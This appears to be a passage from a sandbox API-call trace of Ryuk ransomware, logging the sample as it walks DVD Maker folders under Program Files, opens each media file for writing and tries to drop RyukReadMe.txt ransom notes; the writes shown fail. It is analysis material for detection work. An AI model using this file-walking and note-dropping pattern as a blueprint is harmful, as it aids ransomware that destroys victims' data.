VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.415] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", dwFileAttributes=0x80) returned 0 [0133.415] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.416] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.416] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.416] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.416] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.416] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.416] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.416] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.416] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.416] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.416] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.417] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png", dwFileAttributes=0x80) returned 0 [0133.417] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.417] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.417] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.417] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.417] SetLastError (dwErrCode=0x0) [0133.417] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.418] GetLastError () returned 0x5 [0133.418] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.418] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.418] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.420] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.420] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.420] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.420] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png", dwFileAttributes=0x80) returned 0 [0133.421] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.421] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.421] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.421] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.421] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.422] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv", dwFileAttributes=0x80) returned 0 [0133.422] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.422] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.422] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.422] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.422] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.423] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.423] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.423] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.423] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.423] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.423] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.423] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv", dwFileAttributes=0x80) returned 0 [0133.423] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.423] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.423] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.424] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.424] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.424] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.424] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.424] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.424] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.424] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.424] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.424] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv", dwFileAttributes=0x80) returned 0 [0133.425] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.425] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.425] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.425] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.425] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.426] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.426] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.426] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.426] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.426] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.426] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.426] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv", dwFileAttributes=0x80) returned 0 [0133.426] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.426] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.426] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.427] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.427] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.427] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.427] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.427] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.427] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.427] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.427] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.427] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv", dwFileAttributes=0x80) returned 0 [0133.428] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.428] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.428] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.428] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.428] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.428] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.429] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.429] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.429] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.429] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.429] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.429] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG", dwFileAttributes=0x80) returned 0 [0133.429] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\lightbluerectangle.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.429] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.429] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.429] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.429] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.430] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0133.430] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\mainmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.430] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.430] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.430] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.430] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.430] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.431] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\navsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.431] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.431] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.431] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.431] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.431] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png", dwFileAttributes=0x80) returned 0 [0133.431] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.432] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.432] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.432] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.432] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.432] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png", dwFileAttributes=0x80) returned 0 [0133.432] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_rightarrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.432] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.432] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.432] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.432] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.432] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png", dwFileAttributes=0x80) returned 0 [0133.433] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_uparrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.433] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.433] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.433] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.433] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.434] SetLastError (dwErrCode=0x0) [0133.434] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.436] GetLastError () returned 0x5 [0133.436] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.436] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.436] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.436] SetLastError (dwErrCode=0x0) [0133.436] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.436] GetLastError () returned 0x5 [0133.436] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.436] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.436] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.438] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.438] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.438] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.438] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png", dwFileAttributes=0x80) returned 0 [0133.438] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.438] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.438] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.439] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.439] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.439] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png", dwFileAttributes=0x80) returned 0 [0133.439] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.439] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.439] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.440] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.440] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.440] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png", dwFileAttributes=0x80) returned 0 [0133.440] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.440] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.440] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.440] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.440] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.440] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png", dwFileAttributes=0x80) returned 0 [0133.441] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\babypink.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.441] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.441] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.441] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.441] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.441] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png", dwFileAttributes=0x80) returned 0 [0133.441] CreateFileW (lpFileName="C:\\Program Files\\DVD 